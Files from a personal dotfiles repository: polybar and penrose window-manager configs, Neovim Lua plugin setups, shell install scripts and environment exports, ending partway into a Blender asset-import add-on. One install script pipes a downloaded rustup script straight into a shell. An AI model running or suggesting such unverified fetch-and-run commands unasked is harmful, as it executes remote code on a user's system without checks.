&\n\n[module/date]\ntype = custom/script\nexec = date '+%a %e %b %H:%M' \ninterval = 60\ntail=true\n\nclick-left = ~/.config/polybar/scripts/calendar.sh &\n\n[module/power-menu]\ntype = custom/script\nexec = echo \"󰐥 \"\n\n[settings]\nscreenchange-reload = false\npseudo-transparency = false\n\n[global/wm]\nmargin-top = 3\nmargin-bottom = 5\n\n; vim:ft=dosini\n" }, { "alpha_fraction": 0.57351154088974, "alphanum_fraction": 0.5788578391075134, "avg_line_length": 37.82075500488281, "blob_id": "cbe21ab902c4fc8e5216a3e0dc70a185da2f517c", "content_id": "b39fb500284b229e3c267a7bc5b4dd8f6f95c134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 4115, "license_type": "no_license", "max_line_length": 98, "num_lines": 106, "path": "/penrose/src/main.rs", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "/**\n * My personal penrose config (build from the head of develop)\n */\n#[macro_use]\nextern crate penrose;\n\nuse penrose::helpers::spawn;\nuse penrose::hooks::LayoutHook;\nuse penrose::layout::{bottom_stack, paper, side_stack};\nuse penrose::{\n Backward, Config, Forward, Layout, LayoutConf, Less, More, WindowManager, XcbConnection,\n};\nuse simplelog::{LevelFilter, SimpleLogger};\nuse std::env;\nuse std::process::Command;\n\nfn main() {\n SimpleLogger::init(LevelFilter::Info, simplelog::Config::default()).unwrap();\n\n let mut config = Config::default();\n config.workspaces = &[\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"];\n config.fonts = &[\"ProFont For Powerline:size=10\", \"Iosevka Nerd Font:size=10\"];\n config.floating_classes = &[\"rofi\", \"dmenu\", \"dunst\", \"polybar\", \"pinentry-gtk-2\"];\n\n let follow_focus_conf = LayoutConf {\n floating: false,\n gapless: true,\n follow_focus: true,\n };\n let n_main = 1;\n let ratio = 0.6;\n config.layouts = vec![\n Layout::new(\"[side]\", LayoutConf::default(), side_stack, n_main, ratio),\n Layout::new(\"[botm]\", LayoutConf::default(), bottom_stack, n_main, ratio),\n Layout::new(\"[papr]\", follow_focus_conf, paper, n_main, ratio),\n Layout::floating(\"[----]\"),\n ];\n\n let home = env::var(\"HOME\").unwrap();\n let 
power_script = format!(\"{}/bin/scripts/power-menu.sh\", home);\n let power_menu = Box::new(move |wm: &mut WindowManager| {\n match Command::new(&power_script).output() {\n Ok(choice) => {\n match String::from_utf8(choice.stdout).unwrap().as_str() {\n \"restart-wm\\n\" => wm.exit(),\n _ => (), // other options are handled by the script\n }\n }\n Err(_) => return, // user exited without making a choice\n };\n });\n\n let key_bindings = gen_keybindings! {\n // Program launch\n \"M-semicolon\" => run_external!(\"rofi-apps\"),\n \"M-Return\" => run_external!(\"st\"),\n\n // actions\n \"M-A-s\" => run_external!(\"screenshot\"),\n \"M-A-k\" => run_external!(\"toggle-kb-for-tada\"),\n \"M-A-l\" => run_external!(\"lock-screen\"),\n \"M-A-m\" => run_external!(\"xrandr --output HDMI-1 --auto --right-of eDP-1 \"),\n\n // client management\n \"M-j\" => run_internal!(cycle_client, Forward),\n \"M-k\" => run_internal!(cycle_client, Backward),\n \"M-S-j\" => run_internal!(drag_client, Forward),\n \"M-S-k\" => run_internal!(drag_client, Backward),\n \"M-S-q\" => run_internal!(kill_client),\n\n // workspace management\n \"M-Tab\" => run_internal!(toggle_workspace),\n \"M-bracketright\" => run_internal!(cycle_screen, Forward),\n \"M-bracketleft\" => run_internal!(cycle_screen, Backward),\n \"M-S-bracketright\" => run_internal!(drag_workspace, Forward),\n \"M-S-bracketleft\" => run_internal!(drag_workspace, Backward),\n\n // Layout & window management\n \"M-grave\" => run_internal!(cycle_layout, Forward),\n \"M-S-grave\" => run_internal!(cycle_layout, Backward),\n \"M-A-Up\" => run_internal!(update_max_main, More),\n \"M-A-Down\" => run_internal!(update_max_main, Less),\n \"M-A-Right\" => run_internal!(update_main_ratio, More),\n \"M-A-Left\" => run_internal!(update_main_ratio, Less),\n \"M-A-C-Escape\" => run_internal!(exit),\n \"M-A-Escape\" => power_menu;\n\n forall_workspaces: config.workspaces => {\n \"M-{}\" => focus_workspace,\n \"M-S-{}\" => client_to_workspace,\n }\n };\n\n // Set the root X window name to be the active layout symbol so it can be picked up by polybar\n let active_layout_as_root_name: LayoutHook = |wm: &mut WindowManager, _, _| {\n wm.set_root_window_name(wm.current_layout_symbol());\n };\n config.layout_hooks.push(active_layout_as_root_name);\n\n let conn = XcbConnection::new();\n let mut wm = WindowManager::init(config, &conn);\n\n spawn(format!(\"{}/bin/scripts/penrose-startup.sh\", home));\n active_layout_as_root_name(&mut wm, 0, 0);\n wm.grab_keys_and_run(key_bindings);\n}\n" }, { "alpha_fraction": 0.7851239442825317, "alphanum_fraction": 0.7851239442825317, "avg_line_length": 16.285715103149414, "blob_id": "9adacab1305e6f37279e7e4427b1b050eec33ad3", "content_id": "e7784b1f116545e3a2e941096fbdef3f06a2e0d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 121, "license_type": "no_license", "max_line_length": 21, "num_lines": 7, "path": "/install.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "sudo dependencies.sh\nsh oh-my-zsh.sh\nsh config.sh\nsh powerline-fonts.sh\nsh source-code-pro.sh\nsh rust.sh\nsh gitconfig.sh\n" }, { "alpha_fraction": 0.5882353186607361, "alphanum_fraction": 0.5882353186607361, "avg_line_length": 71.25, "blob_id": "7ac99f0d566aa1ce34c23ee4bdecc815c0569265", "content_id": "ffae060bdfa2d99b54221e4c33aa0d7468b374d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 289, "license_type": "no_license", "max_line_length": 110, 
"num_lines": 4, "path": "/nvim/oldconfig/lua/autocommands.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "vim.cmd([[autocmd CursorHold,CursorHoldI * lua require'nvim-lightbulb'.update_lightbulb()]])\n-- For transparent background\nvim.cmd([[autocmd ColorScheme * hi clear CursorLine]])\nvim.cmd([[au FileType rust let b:AutoPairs = {'(':')', '[':']', '{':'}','\"':'\"', '`':'`', '|':'|', '<':'>'}]])\n" }, { "alpha_fraction": 0.6541176438331604, "alphanum_fraction": 0.7005882263183594, "avg_line_length": 17.085105895996094, "blob_id": "9f715425fde9f852f38793e0f7cee12bc271ce80", "content_id": "17c2b9472adb94c4c68dea7a7af51a9704b0645e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 1704, "license_type": "no_license", "max_line_length": 76, "num_lines": 94, "path": "/penrose/config/polybar/config.ini", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "[global/wm]\nmargin-bottom = 0\nmargin-top = 0\n\n[bar/main]\nmonitor = ${env:MONITOR:}\nmonitor-strict = false\noverride-redirect = true\nbottom = false\nfixed-center = true\nwidth = 100%\nheight = 18\nbackground = ${color.bg}\nforeground = ${color.fg}\nfont-0 = \"ProFont for Powerline:size=11;2\"\nfont-1 = \"Iosevka Nerd Font:size=12;2\"\n\nmodules-left = logo ewmh layout\nmodules-center = title\nmodules-right = kb date\nspacing = 0\ndim-value = 1.0\nwm-name = penrose\n\ntray-position = right\ntray-detached = false\ntray-maxsize = 16\ntray-background = ${color.bg}\n\n\n[color]\nbg = #282828\nfg = #EBDBB2\nbg-alt = #1d2021\nfg-alt = #F9F5D7\ngrey = #504945\nlight-grey = #928374\n\nred = #CC241D\ngreen = #B8BB26\nyellow = #D79921\nblue = #458588\npurple = #B16286\n\n\n[module/ewmh]\ntype = internal/xworkspaces\npin-workspaces = false\n\nformat = <label-state>\nlabel-active-foreground = ${color.fg}\nlabel-occupied-foreground = ${color.light-grey}\nlabel-urgent-foreground = ${color.red}\nlabel-empty-foreground = ${color.grey}\n\n[module/kb]\ntype = internal/xkeyboard\n\n[module/logo]\ntype = custom/text\n\ncontent = \ncontent-background = ${color.blue}\ncontent-foreground = ${color.fg}\ncontent-padding = 1\n\n\n[module/date]\ntype = internal/date\n\ninterval = 1.0\ntime = %I:%M %p\nformat = <label>\nformat-background = ${color.bg}\nformat-padding = 2\nlabel = %time%\n\n[module/title]\ntype = internal/xwindow\n\nformat = <label>\nformat-prefix = \" \"\nformat-prefix-foreground = ${color.blue}\nlabel = %title%\nlabel-maxlen = 30\nlabel-empty = penrose\n\n[module/layout]\ntype = custom/script\nexec = awk '/\\[INFO\\] ACTIVE_LAYOUT/ { print $4 }' ~/.penrose.log | tail -n1\ninterval = 1\nformat-padding = 1\n; exec = ~/.config/polybar/layout_from_penrose_log.sh\n; tail = true\n" }, { "alpha_fraction": 0.797468364238739, "alphanum_fraction": 0.797468364238739, "avg_line_length": 25.33333396911621, "blob_id": "10c0549daecb13fdbda7a0d676cb22d8e6f8e08b", "content_id": "521297f1e124db528bb8c1c0ca072f5c2e3646fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 79, "license_type": "no_license", "max_line_length": 48, "num_lines": 3, "path": "/alacritty.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "git clone https://github.com/jwilm/alacritty.git\ncd alacritty\ncargo install -f\n" }, { "alpha_fraction": 0.587437093257904, "alphanum_fraction": 0.5935653448104858, "avg_line_length": 31.176055908203125, "blob_id": "46e52699c5e36c1d444a727a8463f1166f7a4a4f", "content_id": 
"4e542c2015e259ab60bf2b683693fb8d26f4ca08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 4573, "license_type": "no_license", "max_line_length": 159, "num_lines": 142, "path": "/nvim/oldconfig/lua/compe-completion.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "-- Setup nvim-cmp.\nlocal cmp = require'cmp'\nvim.o.completeopt = \"menu,menuone,noselect\"\n\ncmp.setup({\n --snippet = {\n -- -- REQUIRED - you must specify a snippet engine\n -- expand = function(args)\n -- vim.fn[\"vsnip#anonymous\"](args.body) -- For `vsnip` users.\n -- -- require('luasnip').lsp_expand(args.body) -- For `luasnip` users.\n -- -- require('snippy').expand_snippet(args.body) -- For `snippy` users.\n -- -- vim.fn[\"UltiSnips#Anon\"](args.body) -- For `ultisnips` users.\n -- end,\n --},\n mapping = cmp.mapping.preset.insert({\n ['<C-b>'] = cmp.mapping.scroll_docs(-4),\n ['<C-f>'] = cmp.mapping.scroll_docs(4),\n ['<C-Space>'] = cmp.mapping.complete({}),\n ['<C-e>'] = cmp.mapping.abort(),\n ['<CR>'] = cmp.mapping.confirm({ select = true }), -- Accept currently selected item. Set `select` to `false` to only confirm explicitly selected items.\n ['<TAB>'] = cmp.mapping.confirm({ select = true }), -- Accept currently selected item. Set `select` to `false` to only confirm explicitly selected items.\n }),\n sources = cmp.config.sources({\n { name = 'nvim_lsp' },\n { name = 'vsnip' }, -- For vsnip users.\n -- { name = 'luasnip' }, -- For luasnip users.\n -- { name = 'ultisnips' }, -- For ultisnips users.\n -- { name = 'snippy' }, -- For snippy users.\n }, {\n { name = 'buffer' },\n })\n})\n\n-- Set configuration for specific filetype.\ncmp.setup.filetype('gitcommit', {\n sources = cmp.config.sources({\n { name = 'cmp_git' }, -- You can specify the `cmp_git` source if you were installed it. 
\n }, {\n { name = 'buffer' },\n })\n})\n\n-- Use buffer source for `/` (if you enabled `native_menu`, this won't work anymore).\ncmp.setup.cmdline('/', {\n sources = {\n { name = 'buffer' }\n }\n})\n\n-- Use cmdline & path source for ':' (if you enabled `native_menu`, this won't work anymore).\ncmp.setup.cmdline(':', {\n sources = cmp.config.sources({\n { name = 'path' }\n }, {\n { name = 'cmdline' }\n })\n})\n\n-- Setup lspconfig.\nlocal capabilities = require('cmp_nvim_lsp').default_capabilities(vim.lsp.protocol.make_client_capabilities())\n-- Replace <YOUR_LSP_SERVER> with each lsp server you've enabled.\n--require('lspconfig')['rust_analyzer'].setup {\n-- capabilities = capabilities\n--}\n--vim.o.completeopt = \"menuone,noselect\"\n--\n--require(\"compe\").setup({\n--\tenabled = true,\n--\tautocomplete = true,\n--\tdebug = false,\n--\tmin_length = 1,\n--\tpreselect = \"enable\",\n--\tthrottle_time = 80,\n--\tsource_timeout = 200,\n--\tincomplete_delay = 400,\n--\tmax_abbr_width = 100,\n--\tmax_kind_width = 100,\n--\tmax_menu_width = 100,\n--\tdocumentation = true,\n--\tsource = {\n--\t\tbuffer = { kind = \"﬘\", true },\n--\t\tvsnip = { kind = \"﬌\" }, --replace to what sign you prefer\n--\t\tnvim_lsp = true,\n--\t\tpath = true,\n--\t},\n--})\n--\n--local t = function(str)\n--\treturn vim.api.nvim_replace_termcodes(str, true, true, true)\n--end\n--\n--local check_back_space = function()\n--\tlocal col = vim.fn.col(\".\") - 1\n--\tif col == 0 or vim.fn.getline(\".\"):sub(col, col):match(\"%s\") then\n--\t\treturn true\n--\telse\n--\t\treturn false\n--\tend\n--end\n--\n---- tab completion\n--\n--_G.tab_complete = function()\n--\tif vim.fn.pumvisible() == 1 then\n--\t\treturn t(\"<C-n>\")\n--\telseif check_back_space() then\n--\t\treturn t(\"<Tab>\")\n--\telse\n--\t\treturn vim.fn[\"compe#complete\"]()\n--\tend\n--end\n--_G.s_tab_complete = function()\n--\tif vim.fn.pumvisible() == 1 then\n--\t\treturn t(\"<C-p>\")\n--\telseif vim.fn.call(\"vsnip#jumpable\", { -1 }) == 1 then\n--\t\treturn t(\"<Plug>(vsnip-jump-prev)\")\n--\telse\n--\t\treturn t(\"<S-Tab>\")\n--\tend\n--end\n--\n---- mappings\n--\n--vim.api.nvim_set_keymap(\"i\", \"<C-SPACE>\", \"compe#complete()\", { expr = true, silent = true })\n--vim.api.nvim_set_keymap(\"i\", \"<CR>\", [[compe#confirm(luaeval(\"require 'nvim-autopairs'.autopairs_cr()))]], { expr = true, silent = true })\n----vim.api.nvim_set_keymap(\"i\", \"<CR>\", \"compe#confirm('<CR>')\", { expr = true, silent = true })\n--vim.api.nvim_set_keymap(\"i\", \"<Tab>\", \"v:lua.tab_complete()\", { expr = true })\n--vim.api.nvim_set_keymap(\"s\", \"<Tab>\", \"v:lua.tab_complete()\", { expr = true })\n--vim.api.nvim_set_keymap(\"i\", \"<S-Tab>\", \"v:lua.s_tab_complete()\", { expr = true })\n--vim.api.nvim_set_keymap(\"s\", \"<S-Tab>\", \"v:lua.s_tab_complete()\", { expr = true })\n--\n--function _G.completions()\n--\tlocal npairs = require(\"nvim-autopairs\")\n--\tif vim.fn.pumvisible() == 1 then\n--\t\tif vim.fn.complete_info()[\"selected\"] ~= -1 then\n--\t\t\treturn vim.fn[\"compe#confirm\"](\"<CR>\")\n--\t\tend\n--\tend\n--\treturn npairs.check_break_line_char()\n--end\n--\n--vim.api.nvim_set_keymap(\"i\", \"<CR>\", \"v:lua.completions()\", { expr = true })\n" }, { "alpha_fraction": 0.8194444179534912, "alphanum_fraction": 0.8194444179534912, "avg_line_length": 26, "blob_id": "1d7ea011b6c11a21a0f4bd0c31cae8f370c52d3b", "content_id": "d6a93749bf033b6a1057eff448a92c8cf87461be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", 
"length_bytes": 216, "license_type": "no_license", "max_line_length": 35, "num_lines": 8, "path": "/rust.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "curl https://sh.rustup.rs -sSf | sh\nrustup component add rls\nrustup component add rust-analysis\nrustup component add rust-src\ncargo install racer\ncargo install rustfmt\ncargo install cargo-watch\ncargo install rustsym\n" }, { "alpha_fraction": 0.661556601524353, "alphanum_fraction": 0.661556601524353, "avg_line_length": 55.53333282470703, "blob_id": "e888201aab40c053243eb6c4f32bbf474d6e7b15", "content_id": "213eee320d78c42df23ff04fdcd8eb944a4c1558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 848, "license_type": "no_license", "max_line_length": 118, "num_lines": 15, "path": "/nvim/oldconfig/lua/telescope-nvim.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "require('telescope').setup {}\n\n--require('telescope').load_extension('fzy_native')\n--require('telescope').load_extension('fzf')\n\nlocal opt = { noremap = true, silent = true }\n\n\n-- mappings\n-- vim.api.nvim_set_keymap(\"n\", \"<Leader>pf\", [[<Cmd>lua require('telescope.builtin').find_files()<CR>]], opt)\n--vim.api.nvim_set_keymap(\"n\", \"<Leader>pf\", [[<Cmd>lua require('telescope').extensions.fzf_writer.files()<CR>]], opt)\nvim.api.nvim_set_keymap(\"n\", \"<Leader>pf\", [[<Cmd>lua require('telescope.builtin').find_files()<CR>]], opt)\nvim.api.nvim_set_keymap(\"n\", \"<Leader>pb\", [[<Cmd>lua require('telescope.builtin').buffers()<CR>]], opt)\nvim.api.nvim_set_keymap(\"n\", \"<Leader>fr\", [[<Cmd>lua require('telescope.builtin').reloader()<CR>]], opt)\nvim.api.nvim_set_keymap(\"n\", \"<Leader>gb\", [[<Cmd>lua require('telescope.builtin').git_branches()<CR>]], opt)\n" }, { "alpha_fraction": 0.7382199168205261, "alphanum_fraction": 0.7726252675056458, "avg_line_length": 46.75, "blob_id": "efe52397d9bbca9147f89c6ff4f735fe7a1ed39f", "content_id": "e7bcc4911196902d1d9cc06411ef1a00452bf522", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1337, "license_type": "no_license", "max_line_length": 473, "num_lines": 28, "path": "/zsh/.zshenv", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "export GOPATH=$HOME/.go\nexport PATH=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$HOME/ldc/bin:$HOME/src/DCD/bin:$HOME/src/dfmt/bin:$HOME/.cargo/bin:$HOME/Qt/5.8/gcc_64/lib:$HOME/teamspeak:$HOME/.local/bin:$HOME/Downloads/android-ndk-r15b:$HOME/Downloads/android-ndk-r15b/toolchains/arm-linux-androideabi-4.9/prebuilt/linux-x86_64/bin:$GOPATH/bin:/usr/bin/core_perl/:/opt/miniconda3/bin:/opt/android-sdk-linux/platform-tools:$HOME/.config/rofi/scripts\"\n# export MANPATH=\"/usr/local/man:$MANPATH\"\n#\n# export RUST_SRC_PATH=$HOME/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/src/\n\nexport LD_LIBRARY_PATH=\"$HOME/VulkanSDK/newest/x86_64/lib:$HOME/Qt/5.8/gcc_64/lib\"\n# export VK_LAYER_PATH=$HOME/VulkanSDK/newest/x86_64/etc/explicit_layer.d\n\nexport CARGO_HOME=$HOME/.cargo\n#export TERM=xterm-256color\nexport CARGO_INCREMENTAL=1\nexport RUSTC_FORCE_INCREMENTAL=1\n\nexport _JAVA_AWT_WM_NONREPARENTING=1\nexport WAYLAND_DISPLAY=alacritty\n\nexport BROWSER=firefox\nexport XDG_CONFIG_HOME=\"$HOME/.config\"\nexport DISABLE_AUTO_UPDATE=\"true\"\n# export WINIT_HIDPI_FACTOR=1\n# export TERM=tmux-256color\n# export TERM=xterm-256color\nsource 
\"$HOME/.cargo/env\"\nsource \"/etc/profile.d/flatpak.sh\"\n\nexport ANDROID_SDK_ROOT=/opt/android-sdk-linux\nexport ANDROID_NDK_ROOT=/opt/android-ndk-r21d\n" }, { "alpha_fraction": 0.6446930766105652, "alphanum_fraction": 0.6546719074249268, "avg_line_length": 26.330577850341797, "blob_id": "53a395659942145fe5bba8238b36ce7b7c65aefa", "content_id": "0ceddd70991496012419b8d65cb2a60f25c614e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 3323, "license_type": "no_license", "max_line_length": 82, "num_lines": 121, "path": "/nvim/oldconfig/lua/pluginList.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "local packer = require(\"packer\")\nlocal use = packer.use\nvim.api.nvim_command([[autocmd BufWritePost pluginList.lua PackerCompile]])\n\n-- using { } for using different branch , loading plugin with certain commands etc\nreturn require(\"packer\").startup(function()\n\n\tuse(\"wbthomason/packer.nvim\")\n use { 'ibhagwan/fzf-lua',\n -- optional for icon support\n requires = { 'nvim-tree/nvim-web-devicons' }\n }\n\n\t-- color related stuff\n\tuse(\"siduck76/nvim-base16.lua\")\n\tuse(\"norcalli/nvim-colorizer.lua\")\n\tuse(\"ishan9299/nvim-solarized-lua\")\n\n\t-- lang stuff\n\tuse(\"nvim-treesitter/nvim-treesitter\")\n use 'nvim-treesitter/nvim-treesitter-context'\n\tuse(\"neovim/nvim-lspconfig\")\n --use('glepnir/lspsaga.nvim')\n\t-- use(\"hrsh7th/nvim-compe\")\n use({\n \"ggandor/leap.nvim\",\n\t\tconfig = function()\n\t\t\trequire(\"leap\").setup({\n\t\t\t})\n\t\tend,\n })\n use(\"hrsh7th/cmp-nvim-lsp\")\n use(\"hrsh7th/cmp-buffer\")\n use(\"hrsh7th/cmp-path\")\n use(\"hrsh7th/cmp-cmdline\")\n use(\"hrsh7th/nvim-cmp\")\n\tuse(\"onsails/lspkind-nvim\")\n\tuse(\"sbdchd/neoformat\")\n\tuse(\"nvim-lua/plenary.nvim\")\n use('williamboman/nvim-lsp-installer')\n use {\n \"williamboman/mason.nvim\",\n \"williamboman/mason-lspconfig.nvim\",\n }\n\tuse(\"nvim-lua/lsp_extensions.nvim\")\n use({\n 'weilbith/nvim-code-action-menu',\n cmd = 'CodeActionMenu',\n })\n\tuse(\"ray-x/lsp_signature.nvim\")\n\tuse(\"kosayoda/nvim-lightbulb\")\n\tuse(\"mfussenegger/nvim-dap\")\n\tuse({ \"rcarriga/nvim-dap-ui\", requires = { \"mfussenegger/nvim-dap\" } })\n use(\"beyondmarc/hlsl.vim\")\n\tuse({\n\t\t\"folke/trouble.nvim\",\n\t\t--requires = \"kyazdani42/nvim-web-devicons\",\n\t\tconfig = function()\n\t\t\trequire(\"trouble\").setup({\n\t\t\t})\n\t\tend,\n\t})\n use(\"gfanto/fzf-lsp.nvim\")\n\n\tuse(\"akinsho/nvim-bufferline.lua\")\n\tuse(\"windwp/nvim-autopairs\")\n use(\"jiangmiao/auto-pairs\")\n\tuse(\"alvan/vim-closetag\")\n use(\"tpope/vim-surround\")\n\n\tuse(\"kburdett/vim-nuuid\")\n\t--use(\"thaerkh/vim-workspace\")\n\t-- snippet support\n\tuse(\"hrsh7th/vim-vsnip\")\n\tuse(\"rafamadriz/friendly-snippets\")\n\n\t-- file managing , picker etc\n\tuse(\"kyazdani42/nvim-tree.lua\")\n\tuse(\"kyazdani42/nvim-web-devicons\")\n\t--use(\"ryanoasis/vim-devicons\")\n\tuse(\"nvim-telescope/telescope.nvim\")\n\tuse(\"nvim-telescope/telescope-media-files.nvim\")\n\tuse(\"nvim-lua/popup.nvim\")\n\n\t-- misc\n\tuse(\"rmagatti/auto-session\")\n\tuse(\"tweekmonster/startuptime.vim\")\n\tuse(\"907th/vim-auto-save\")\n\tuse(\"karb94/neoscroll.nvim\")\n\tuse(\"kdav5758/TrueZen.nvim\")\n\tuse(\"folke/which-key.nvim\")\n\tuse(\"nvim-telescope/telescope-fzf-writer.nvim\")\n use 'nvim-telescope/telescope-fzy-native.nvim'\n use {'nvim-telescope/telescope-fzf-native.nvim', run = 'make' }\n\tuse(\"lukas-reineke/indent-blankline.nvim\")\n\tuse({ 
\"TimUntersberger/neogit\", requires = \"nvim-lua/plenary.nvim\" })\n\tuse(\"tpope/vim-fugitive\")\n use(\"tpope/vim-rhubarb\")\n\tuse(\"sindrets/diffview.nvim\")\n\tuse({ \"junegunn/fzf\", dir = \"~/.fzf\", run = \"./install --all\" })\n\t--use(\"junegunn/fzf.vim\")\n use{\n \"MaikKlein/fzf.vim\",\n branch = \"test\"\n }\n\tuse({\n\t\t\"pwntester/octo.nvim\",\n\t\tconfig = function()\n\t\t\trequire(\"octo\").setup()\n\t\tend,\n\t})\n\tuse(\"hoob3rt/lualine.nvim\")\n\t-- themes\n\tuse(\"sainnhe/sonokai\")\n\tuse(\"folke/tokyonight.nvim\")\n\tuse(\"Th3Whit3Wolf/one-nvim\")\nend, {\n\tdisplay = {\n\t\tborder = { \"┌\", \"─\", \"┐\", \"│\", \"┘\", \"─\", \"└\", \"│\" },\n\t},\n})\n" }, { "alpha_fraction": 0.5663161873817444, "alphanum_fraction": 0.5769934058189392, "avg_line_length": 45.68597412109375, "blob_id": "c47cb1d31ab9868f20b08710a018f787cd708f48", "content_id": "983d9e77d79823e140363fd9af3fcdb371713799", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30626, "license_type": "no_license", "max_line_length": 181, "num_lines": 656, "path": "/blender/2.93/scripts/addons/MSPlugin/__init__.py", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "# ##### QUIXEL AB - MEGASCANS PLugin FOR BLENDER #####\n#\n# The Megascans Plugin plugin for Blender is an add-on that lets\n# you instantly import assets with their shader setup with one click only.\n#\n# Because it relies on some of the latest 2.80 features, this plugin is currently\n# only available for Blender 2.80 and forward.\n#\n# You are free to modify, add features or tweak this add-on as you see fit, and\n# don't hesitate to send us some feedback if you've done something cool with it.\n#\n# ##### QUIXEL AB - MEGASCANS PLUGIN FOR BLENDER #####\n\nimport bpy, threading, os, time, json, socket\nfrom bpy.app.handlers import persistent\n\nglobals()['Megascans_DataSet'] = None\n\n# This stuff is for the Alembic support\nglobals()['MG_Material'] = []\nglobals()['MG_AlembicPath'] = []\nglobals()['MG_ImportComplete'] = False\n\nbl_info = {\n \"name\": \"Megascans Plugin\",\n \"description\": \"Connects Blender to Quixel Bridge for one-click imports with shader setup and geometry\",\n \"author\": \"Quixel\",\n \"version\": (3, 2),\n \"blender\": (2, 80, 0),\n \"location\": \"File > Import\",\n \"warning\": \"\", # used for warning icon and text in addons panel\n \"wiki_url\": \"https://docs.quixel.org/bridge/livelinks/blender/info_quickstart.html\",\n \"tracker_url\": \"https://docs.quixel.org/bridge/livelinks/blender/info_quickstart#release_notes\",\n \"support\": \"COMMUNITY\",\n \"category\": \"Import-Export\"\n}\n\n\n# MS_Init_ImportProcess is the main asset import class.\n# This class is invoked whenever a new asset is set from Bridge.\n\nclass MS_Init_ImportProcess():\n\n # This initialization method create the data structure to process our assets\n # later on in the initImportProcess method. 
The method loops on all assets\n # that have been sent by Bridge.\n def __init__(self):\n print(\"Initialized import class...\")\n try:\n # Check if there's any incoming data\n if globals()['Megascans_DataSet'] != None:\n\n globals()['MG_AlembicPath'] = []\n globals()['MG_Material'] = []\n globals()['MG_ImportComplete'] = False\n\n self.json_Array = json.loads(globals()['Megascans_DataSet'])\n\n # Start looping over each asset in the self.json_Array list\n for js in self.json_Array:\n\n self.json_data = js\n\n self.selectedObjects = []\n \n self.IOR = 1.45\n self.assetType = self.json_data[\"type\"]\n self.assetPath = self.json_data[\"path\"]\n self.assetID = self.json_data[\"id\"]\n self.isMetal = bool(self.json_data[\"category\"] == \"Metal\")\n # Workflow setup.\n self.isHighPoly = bool(self.json_data[\"activeLOD\"] == \"high\")\n self.activeLOD = self.json_data[\"activeLOD\"]\n self.minLOD = self.json_data[\"minLOD\"]\n self.RenderEngine = bpy.context.scene.render.engine.lower() # Get the current render engine. i.e. blender_eevee or cycles\n self.Workflow = self.json_data.get('pbrWorkflow', 'specular')\n self.DisplacementSetup = 'regular'\n self.isCycles = bool(self.RenderEngine == 'cycles')\n self.isScatterAsset = self.CheckScatterAsset()\n self.textureList = []\n self.isBillboard = self.CheckIsBillboard()\n self.ApplyToSelection = False\n self.isSpecularWorkflow = True\n self.isAlembic = False\n\n self.NormalSetup = False\n self.BumpSetup = False\n\n if \"workflow\" in self.json_data.keys():\n self.isSpecularWorkflow = bool(self.json_data[\"workflow\"] == \"specular\")\n\n if \"applyToSelection\" in self.json_data.keys():\n self.ApplyToSelection = bool(self.json_data[\"applyToSelection\"])\n\n if (self.isCycles):\n if(bpy.context.scene.cycles.feature_set == 'EXPERIMENTAL'):\n self.DisplacementSetup = 'adaptive'\n \n texturesListName = \"components\"\n if(self.isBillboard):\n texturesListName = \"components\"\n\n # Get a list of all available texture maps. item[1] returns the map type (albedo, normal, etc...).\n self.textureTypes = [obj[\"type\"] for obj in self.json_data[texturesListName]]\n self.textureList = []\n\n for obj in self.json_data[texturesListName]:\n texFormat = obj[\"format\"]\n texType = obj[\"type\"]\n texPath = obj[\"path\"]\n\n if texType == \"displacement\" and texFormat != \"exr\":\n texDir = os.path.dirname(texPath)\n texName = os.path.splitext(os.path.basename(texPath))[0]\n\n if os.path.exists(os.path.join(texDir, texName + \".exr\")):\n texPath = os.path.join(texDir, texName + \".exr\")\n texFormat = \"exr\"\n # Replace diffuse texture type with albedo so we don't have to add more conditions to handle diffuse map.\n if texType == \"diffuse\" and \"albedo\" not in self.textureTypes:\n texType = \"albedo\"\n self.textureTypes.append(\"albedo\")\n self.textureTypes.remove(\"diffuse\")\n\n # Normal / Bump setup checks\n if texType == \"normal\":\n self.NormalSetup = True\n if texType == \"bump\":\n self.BumpSetup = True\n\n self.textureList.append((texFormat, texType, texPath))\n\n # Create a tuple list of all the 3d meshes available.\n # This tuple is composed of (meshFormat, meshPath)\n self.geometryList = [(obj[\"format\"], obj[\"path\"]) for obj in self.json_data[\"meshList\"]]\n\n # Create name of our asset. Multiple conditions are set here\n # in order to make sure the asset actually has a name and that the name\n # is short enough for us to use it. 
